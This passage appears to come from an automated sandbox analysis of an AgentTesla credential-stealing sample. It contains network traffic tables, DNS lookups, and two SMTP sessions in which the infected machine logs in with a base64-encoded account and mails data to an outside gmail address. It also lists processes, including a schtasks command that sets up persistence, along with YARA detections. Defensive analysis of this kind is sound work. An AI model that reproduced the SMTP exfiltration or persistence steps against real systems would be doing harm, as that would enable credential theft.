Nov 29, 2022 16:52:16.482769012 CET | 587 | 49722 | 111.118.212.38 | 192.168.2.6
Nov 29, 2022 16:52:17.294580936 CET | 587 | 49722 | 111.118.212.38 | 192.168.2.6
Nov 29, 2022 16:52:17.297631979 CET | 49722 | 587 | 192.168.2.6 | 111.118.212.38
Nov 29, 2022 16:52:17.575767994 CET | 587 | 49722 | 111.118.212.38 | 192.168.2.6
Nov 29, 2022 16:52:17.575813055 CET | 587 | 49722 | 111.118.212.38 | 192.168.2.6
Nov 29, 2022 16:52:17.576160908 CET | 49722 | 587 | 192.168.2.6 | 111.118.212.38
Nov 29, 2022 16:52:17.894834995 CET | 587 | 49722 | 111.118.212.38 | 192.168.2.6
Nov 29, 2022 16:52:17.900510073 CET | 587 | 49722 | 111.118.212.38 | 192.168.2.6
Nov 29, 2022 16:52:17.901293039 CET | 49722 | 587 | 192.168.2.6 | 111.118.212.38
Nov 29, 2022 16:52:18.179555893 CET | 587 | 49722 | 111.118.212.38 | 192.168.2.6
Nov 29, 2022 16:52:18.179738045 CET | 587 | 49722 | 111.118.212.38 | 192.168.2.6
Nov 29, 2022 16:52:18.188399076 CET | 49722 | 587 | 192.168.2.6 | 111.118.212.38
Nov 29, 2022 16:52:18.188513041 CET | 49722 | 587 | 192.168.2.6 | 111.118.212.38
Nov 29, 2022 16:52:18.188616991 CET | 49722 | 587 | 192.168.2.6 | 111.118.212.38
Nov 29, 2022 16:52:18.188690901 CET | 49722 | 587 | 192.168.2.6 | 111.118.212.38
Nov 29, 2022 16:52:18.466383934 CET | 587 | 49722 | 111.118.212.38 | 192.168.2.6
Nov 29, 2022 16:52:18.467991114 CET | 587 | 49722 | 111.118.212.38 | 192.168.2.6
Nov 29, 2022 16:52:18.514267921 CET | 49722 | 587 | 192.168.2.6 | 111.118.212.38
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 29, 2022 16:50:57.772516966 CET | 59082 | 53 | 192.168.2.6 | 8.8.8.8
Nov 29, 2022 16:50:57.789524078 CET | 53 | 59082 | 8.8.8.8 | 192.168.2.6
Nov 29, 2022 16:50:57.822091103 CET | 59504 | 53 | 192.168.2.6 | 8.8.8.8
Nov 29, 2022 16:50:57.841023922 CET | 53 | 59504 | 8.8.8.8 | 192.168.2.6
Nov 29, 2022 16:51:19.333461046 CET | 63229 | 53 | 192.168.2.6 | 8.8.8.8
Nov 29, 2022 16:51:19.724127054 CET | 53 | 63229 | 8.8.8.8 | 192.168.2.6
Nov 29, 2022 16:51:19.859044075 CET | 62538 | 53 | 192.168.2.6 | 8.8.8.8
Nov 29, 2022 16:51:19.876422882 CET | 53 | 62538 | 8.8.8.8 | 192.168.2.6
Nov 29, 2022 16:51:46.733128071 CET | 56122 | 53 | 192.168.2.6 | 8.8.8.8
Nov 29, 2022 16:51:46.752038956 CET | 53 | 56122 | 8.8.8.8 | 192.168.2.6
Nov 29, 2022 16:51:46.779407978 CET | 52556 | 53 | 192.168.2.6 | 8.8.8.8
Nov 29, 2022 16:51:46.796346903 CET | 53 | 52556 | 8.8.8.8 | 192.168.2.6
Nov 29, 2022 16:52:10.584884882 CET | 52481 | 53 | 192.168.2.6 | 8.8.8.8
Nov 29, 2022 16:52:10.964626074 CET | 53 | 52481 | 8.8.8.8 | 192.168.2.6
Nov 29, 2022 16:52:11.035455942 CET | 53943 | 53 | 192.168.2.6 | 8.8.8.8
Nov 29, 2022 16:52:11.434695959 CET | 53 | 53943 | 8.8.8.8 | 192.168.2.6
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Nov 29, 2022 16:50:57.772516966 CET | 192.168.2.6 | 8.8.8.8 | 0x2ea1 | Standard query (0) | api.ipify.org | A (IP address) | IN (0x0001) | false
Nov 29, 2022 16:50:57.822091103 CET | 192.168.2.6 | 8.8.8.8 | 0xa8aa | Standard query (0) | api.ipify.org | A (IP address) | IN (0x0001) | false
Nov 29, 2022 16:51:19.333461046 CET | 192.168.2.6 | 8.8.8.8 | 0xe3da | Standard query (0) | mail.strictfacilityservices.com | A (IP address) | IN (0x0001) | false
Nov 29, 2022 16:51:19.859044075 CET | 192.168.2.6 | 8.8.8.8 | 0xf4ba | Standard query (0) | mail.strictfacilityservices.com | A (IP address) | IN (0x0001) | false
Nov 29, 2022 16:51:46.733128071 CET | 192.168.2.6 | 8.8.8.8 | 0x1df9 | Standard query (0) | api.ipify.org | A (IP address) | IN (0x0001) | false
Nov 29, 2022 16:51:46.779407978 CET | 192.168.2.6 | 8.8.8.8 | 0x6660 | Standard query (0) | api.ipify.org | A (IP address) | IN (0x0001) | false
Nov 29, 2022 16:52:10.584884882 CET | 192.168.2.6 | 8.8.8.8 | 0x1930 | Standard query (0) | mail.strictfacilityservices.com | A (IP address) | IN (0x0001) | false
Nov 29, 2022 16:52:11.035455942 CET | 192.168.2.6 | 8.8.8.8 | 0xd825 | Standard query (0) | mail.strictfacilityservices.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Nov 29, 2022 16:50:57.789524078 CET | 8.8.8.8 | 192.168.2.6 | 0x2ea1 | No error (0) | api.ipify.org | api.ipify.org.herokudns.com | | CNAME (Canonical name) | IN (0x0001) | false
Nov 29, 2022 16:50:57.789524078 CET | 8.8.8.8 | 192.168.2.6 | 0x2ea1 | No error (0) | api.ipify.org.herokudns.com | | 52.20.78.240 | A (IP address) | IN (0x0001) | false
Nov 29, 2022 16:50:57.789524078 CET | 8.8.8.8 | 192.168.2.6 | 0x2ea1 | No error (0) | api.ipify.org.herokudns.com | | 3.220.57.224 | A (IP address) | IN (0x0001) | false
Nov 29, 2022 16:50:57.789524078 CET | 8.8.8.8 | 192.168.2.6 | 0x2ea1 | No error (0) | api.ipify.org.herokudns.com | | 3.232.242.170 | A (IP address) | IN (0x0001) | false
Nov 29, 2022 16:50:57.789524078 CET | 8.8.8.8 | 192.168.2.6 | 0x2ea1 | No error (0) | api.ipify.org.herokudns.com | | 54.91.59.199 | A (IP address) | IN (0x0001) | false
Nov 29, 2022 16:50:57.841023922 CET | 8.8.8.8 | 192.168.2.6 | 0xa8aa | No error (0) | api.ipify.org | api.ipify.org.herokudns.com | | CNAME (Canonical name) | IN (0x0001) | false
Nov 29, 2022 16:50:57.841023922 CET | 8.8.8.8 | 192.168.2.6 | 0xa8aa | No error (0) | api.ipify.org.herokudns.com | | 52.20.78.240 | A (IP address) | IN (0x0001) | false
Nov 29, 2022 16:50:57.841023922 CET | 8.8.8.8 | 192.168.2.6 | 0xa8aa | No error (0) | api.ipify.org.herokudns.com | | 3.232.242.170 | A (IP address) | IN (0x0001) | false
Nov 29, 2022 16:50:57.841023922 CET | 8.8.8.8 | 192.168.2.6 | 0xa8aa | No error (0) | api.ipify.org.herokudns.com | | 54.91.59.199 | A (IP address) | IN (0x0001) | false
Nov 29, 2022 16:50:57.841023922 CET | 8.8.8.8 | 192.168.2.6 | 0xa8aa | No error (0) | api.ipify.org.herokudns.com | | 3.220.57.224 | A (IP address) | IN (0x0001) | false
Nov 29, 2022 16:51:19.724127054 CET | 8.8.8.8 | 192.168.2.6 | 0xe3da | No error (0) | mail.strictfacilityservices.com | strictfacilityservices.com | | CNAME (Canonical name) | IN (0x0001) | false
Nov 29, 2022 16:51:19.724127054 CET | 8.8.8.8 | 192.168.2.6 | 0xe3da | No error (0) | strictfacilityservices.com | | 111.118.212.38 | A (IP address) | IN (0x0001) | false
Nov 29, 2022 16:51:19.876422882 CET | 8.8.8.8 | 192.168.2.6 | 0xf4ba | No error (0) | mail.strictfacilityservices.com | strictfacilityservices.com | | CNAME (Canonical name) | IN (0x0001) | false
Nov 29, 2022 16:51:19.876422882 CET | 8.8.8.8 | 192.168.2.6 | 0xf4ba | No error (0) | strictfacilityservices.com | | 111.118.212.38 | A (IP address) | IN (0x0001) | false
Nov 29, 2022 16:51:46.752038956 CET | 8.8.8.8 | 192.168.2.6 | 0x1df9 | No error (0) | api.ipify.org | api.ipify.org.herokudns.com | | CNAME (Canonical name) | IN (0x0001) | false
Nov 29, 2022 16:51:46.752038956 CET | 8.8.8.8 | 192.168.2.6 | 0x1df9 | No error (0) | api.ipify.org.herokudns.com | | 3.232.242.170 | A (IP address) | IN (0x0001) | false
Nov 29, 2022 16:51:46.752038956 CET | 8.8.8.8 | 192.168.2.6 | 0x1df9 | No error (0) | api.ipify.org.herokudns.com | | 3.220.57.224 | A (IP address) | IN (0x0001) | false
Nov 29, 2022 16:51:46.752038956 CET | 8.8.8.8 | 192.168.2.6 | 0x1df9 | No error (0) | api.ipify.org.herokudns.com | | 52.20.78.240 | A (IP address) | IN (0x0001) | false
Nov 29, 2022 16:51:46.752038956 CET | 8.8.8.8 | 192.168.2.6 | 0x1df9 | No error (0) | api.ipify.org.herokudns.com | | 54.91.59.199 | A (IP address) | IN (0x0001) | false
Nov 29, 2022 16:51:46.796346903 CET | 8.8.8.8 | 192.168.2.6 | 0x6660 | No error (0) | api.ipify.org | api.ipify.org.herokudns.com | | CNAME (Canonical name) | IN (0x0001) | false
Nov 29, 2022 16:51:46.796346903 CET | 8.8.8.8 | 192.168.2.6 | 0x6660 | No error (0) | api.ipify.org.herokudns.com | | 54.91.59.199 | A (IP address) | IN (0x0001) | false
Nov 29, 2022 16:51:46.796346903 CET | 8.8.8.8 | 192.168.2.6 | 0x6660 | No error (0) | api.ipify.org.herokudns.com | | 3.220.57.224 | A (IP address) | IN (0x0001) | false
Nov 29, 2022 16:51:46.796346903 CET | 8.8.8.8 | 192.168.2.6 | 0x6660 | No error (0) | api.ipify.org.herokudns.com | | 3.232.242.170 | A (IP address) | IN (0x0001) | false
Nov 29, 2022 16:51:46.796346903 CET | 8.8.8.8 | 192.168.2.6 | 0x6660 | No error (0) | api.ipify.org.herokudns.com | | 52.20.78.240 | A (IP address) | IN (0x0001) | false
Nov 29, 2022 16:52:10.964626074 CET | 8.8.8.8 | 192.168.2.6 | 0x1930 | No error (0) | mail.strictfacilityservices.com | strictfacilityservices.com | | CNAME (Canonical name) | IN (0x0001) | false
Nov 29, 2022 16:52:10.964626074 CET | 8.8.8.8 | 192.168.2.6 | 0x1930 | No error (0) | strictfacilityservices.com | | 111.118.212.38 | A (IP address) | IN (0x0001) | false
Nov 29, 2022 16:52:11.434695959 CET | 8.8.8.8 | 192.168.2.6 | 0xd825 | No error (0) | mail.strictfacilityservices.com | strictfacilityservices.com | | CNAME (Canonical name) | IN (0x0001) | false
Nov 29, 2022 16:52:11.434695959 CET | 8.8.8.8 | 192.168.2.6 | 0xd825 | No error (0) | strictfacilityservices.com | | 111.118.212.38 | A (IP address) | IN (0x0001) | false
                                                  • api.ipify.org
Timestamp | Source Port | Dest Port | Source IP | Dest IP | Commands
Nov 29, 2022 16:51:21.977685928 CET | 587 | 49717 | 111.118.212.38 | 192.168.2.6 | 220-bh-in-36.webhostbox.net ESMTP Exim 4.95 #2 Tue, 29 Nov 2022 15:51:21 +0000
    220-We do not authorize the use of this system to transport unsolicited,
    220 and/or bulk e-mail.
Nov 29, 2022 16:51:21.978070021 CET | 49717 | 587 | 192.168.2.6 | 111.118.212.38 | EHLO 302494
Nov 29, 2022 16:51:22.252252102 CET | 587 | 49717 | 111.118.212.38 | 192.168.2.6 | 250-bh-in-36.webhostbox.net Hello 302494 [102.129.143.49]
    250-SIZE 52428800
    250-8BITMIME
    250-PIPELINING
    250-PIPE_CONNECT
    250-AUTH PLAIN LOGIN
    250-STARTTLS
    250 HELP
Nov 29, 2022 16:51:22.253521919 CET | 49717 | 587 | 192.168.2.6 | 111.118.212.38 | AUTH login YWNjb3VudHNAc3RyaWN0ZmFjaWxpdHlzZXJ2aWNlcy5jb20=
Nov 29, 2022 16:51:22.526686907 CET | 587 | 49717 | 111.118.212.38 | 192.168.2.6 | 334 UGFzc3dvcmQ6
Nov 29, 2022 16:51:23.584398985 CET | 587 | 49717 | 111.118.212.38 | 192.168.2.6 | 235 Authentication succeeded
Nov 29, 2022 16:51:23.585345030 CET | 49717 | 587 | 192.168.2.6 | 111.118.212.38 | MAIL FROM:<accounts@strictfacilityservices.com>
Nov 29, 2022 16:51:23.860614061 CET | 587 | 49717 | 111.118.212.38 | 192.168.2.6 | 250 OK
Nov 29, 2022 16:51:23.860863924 CET | 49717 | 587 | 192.168.2.6 | 111.118.212.38 | RCPT TO:<guc850155@gmail.com>
Nov 29, 2022 16:51:24.168071032 CET | 587 | 49717 | 111.118.212.38 | 192.168.2.6 | 250 Accepted
Nov 29, 2022 16:51:24.169872999 CET | 49717 | 587 | 192.168.2.6 | 111.118.212.38 | DATA
Nov 29, 2022 16:51:24.443375111 CET | 587 | 49717 | 111.118.212.38 | 192.168.2.6 | 354 Enter message, ending with "." on a line by itself
Nov 29, 2022 16:51:24.450061083 CET | 49717 | 587 | 192.168.2.6 | 111.118.212.38 | .
Nov 29, 2022 16:51:24.724167109 CET | 587 | 49717 | 111.118.212.38 | 192.168.2.6 | 250 OK id=1p02tI-0007mJ-Bj
Nov 29, 2022 16:52:14.190653086 CET | 587 | 49722 | 111.118.212.38 | 192.168.2.6 | 220-bh-in-36.webhostbox.net ESMTP Exim 4.95 #2 Tue, 29 Nov 2022 15:52:14 +0000
    220-We do not authorize the use of this system to transport unsolicited,
    220 and/or bulk e-mail.
Nov 29, 2022 16:52:14.194787025 CET | 49722 | 587 | 192.168.2.6 | 111.118.212.38 | EHLO 302494
Nov 29, 2022 16:52:14.473042011 CET | 587 | 49722 | 111.118.212.38 | 192.168.2.6 | 250-bh-in-36.webhostbox.net Hello 302494 [102.129.143.49]
    250-SIZE 52428800
    250-8BITMIME
    250-PIPELINING
    250-PIPE_CONNECT
    250-AUTH PLAIN LOGIN
    250-STARTTLS
    250 HELP
Nov 29, 2022 16:52:14.499712944 CET | 49722 | 587 | 192.168.2.6 | 111.118.212.38 | AUTH login YWNjb3VudHNAc3RyaWN0ZmFjaWxpdHlzZXJ2aWNlcy5jb20=
Nov 29, 2022 16:52:14.778090954 CET | 587 | 49722 | 111.118.212.38 | 192.168.2.6 | 334 UGFzc3dvcmQ6
Nov 29, 2022 16:52:17.294580936 CET | 587 | 49722 | 111.118.212.38 | 192.168.2.6 | 235 Authentication succeeded
Nov 29, 2022 16:52:17.297631979 CET | 49722 | 587 | 192.168.2.6 | 111.118.212.38 | MAIL FROM:<accounts@strictfacilityservices.com>
Nov 29, 2022 16:52:17.575813055 CET | 587 | 49722 | 111.118.212.38 | 192.168.2.6 | 250 OK
Nov 29, 2022 16:52:17.576160908 CET | 49722 | 587 | 192.168.2.6 | 111.118.212.38 | RCPT TO:<guc850155@gmail.com>
Nov 29, 2022 16:52:17.900510073 CET | 587 | 49722 | 111.118.212.38 | 192.168.2.6 | 250 Accepted
Nov 29, 2022 16:52:17.901293039 CET | 49722 | 587 | 192.168.2.6 | 111.118.212.38 | DATA
Nov 29, 2022 16:52:18.179738045 CET | 587 | 49722 | 111.118.212.38 | 192.168.2.6 | 354 Enter message, ending with "." on a line by itself
Nov 29, 2022 16:52:18.188690901 CET | 49722 | 587 | 192.168.2.6 | 111.118.212.38 | .
Nov 29, 2022 16:52:18.467991114 CET | 587 | 49722 | 111.118.212.38 | 192.168.2.6 | 250 OK id=1p02uA-00087S-33


                                                  Target ID:0
                                                  Start time:16:50:18
                                                  Start date:29/11/2022
                                                  Path:C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe
                                                  Imagebase:0x690000
                                                  File size:847360 bytes
                                                  MD5 hash:FE1AA7FA995970EBB34465D5DC0D8CE1
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:.Net C# or VB.NET
                                                  Yara matches:
                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.325021706.0000000003D0C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000000.00000002.325021706.0000000003D0C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: Windows_Trojan_AgentTesla_d3ac2b2f, Description: unknown, Source: 00000000.00000002.325021706.0000000003D0C000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                  Reputation:low

                                                  Target ID:8
                                                  Start time:16:50:43
                                                  Start date:29/11/2022
                                                  Path:C:\Windows\SysWOW64\schtasks.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:C:\Windows\System32\schtasks.exe" /Create /TN "Updates\nrQtAokXKaSn" /XML "C:\Users\user\AppData\Local\Temp\tmp152E.tmp
                                                  Imagebase:0x210000
                                                  File size:185856 bytes
                                                  MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high

                                                  Target ID:9
                                                  Start time:16:50:44
                                                  Start date:29/11/2022
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff6da640000
                                                  File size:625664 bytes
                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high

                                                  Target ID:10
                                                  Start time:16:50:44
                                                  Start date:29/11/2022
                                                  Path:C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:{path}
                                                  Imagebase:0x370000
                                                  File size:847360 bytes
                                                  MD5 hash:FE1AA7FA995970EBB34465D5DC0D8CE1
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:low

                                                  Target ID:11
                                                  Start time:16:50:44
                                                  Start date:29/11/2022
                                                  Path:C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:{path}
                                                  Imagebase:0x870000
                                                  File size:847360 bytes
                                                  MD5 hash:FE1AA7FA995970EBB34465D5DC0D8CE1
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:.Net C# or VB.NET
                                                  Yara matches:
                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000B.00000000.315331976.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 0000000B.00000000.315331976.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: Windows_Trojan_AgentTesla_d3ac2b2f, Description: unknown, Source: 0000000B.00000000.315331976.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.532293061.0000000002CF4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.531415625.0000000002CA1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  Reputation:low

                                                  Target ID:12
                                                  Start time:16:50:45
                                                  Start date:29/11/2022
                                                  Path:C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe
                                                  Imagebase:0x5c0000
                                                  File size:847360 bytes
                                                  MD5 hash:FE1AA7FA995970EBB34465D5DC0D8CE1
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:.Net C# or VB.NET
                                                  Antivirus matches:
                                                  • Detection: 100%, Joe Sandbox ML
                                                  • Detection: 32%, ReversingLabs
                                                  Reputation:low

                                                  Target ID:13
                                                  Start time:16:51:31
                                                  Start date:29/11/2022
                                                  Path:C:\Windows\SysWOW64\schtasks.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:C:\Windows\System32\schtasks.exe" /Create /TN "Updates\nrQtAokXKaSn" /XML "C:\Users\user\AppData\Local\Temp\tmpCC0B.tmp
                                                  Imagebase:0x210000
                                                  File size:185856 bytes
                                                  MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high

                                                  Target ID:14
                                                  Start time:16:51:31
                                                  Start date:29/11/2022
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff6da640000
                                                  File size:625664 bytes
                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high

                                                  Target ID:15
                                                  Start time:16:51:32
                                                  Start date:29/11/2022
                                                  Path:C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:{path}
                                                  Imagebase:0x2e0000
                                                  File size:847360 bytes
                                                  MD5 hash:FE1AA7FA995970EBB34465D5DC0D8CE1
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Reputation:low

                                                  Target ID:16
                                                  Start time:16:51:33
                                                  Start date:29/11/2022
                                                  Path:C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:{path}
                                                  Imagebase:0x460000
                                                  File size:847360 bytes
                                                  MD5 hash:FE1AA7FA995970EBB34465D5DC0D8CE1
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:.Net C# or VB.NET
                                                  Yara matches:
                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000010.00000002.533369231.00000000028E4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000010.00000002.532462363.0000000002891000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  Reputation:low

                                                  No disassembly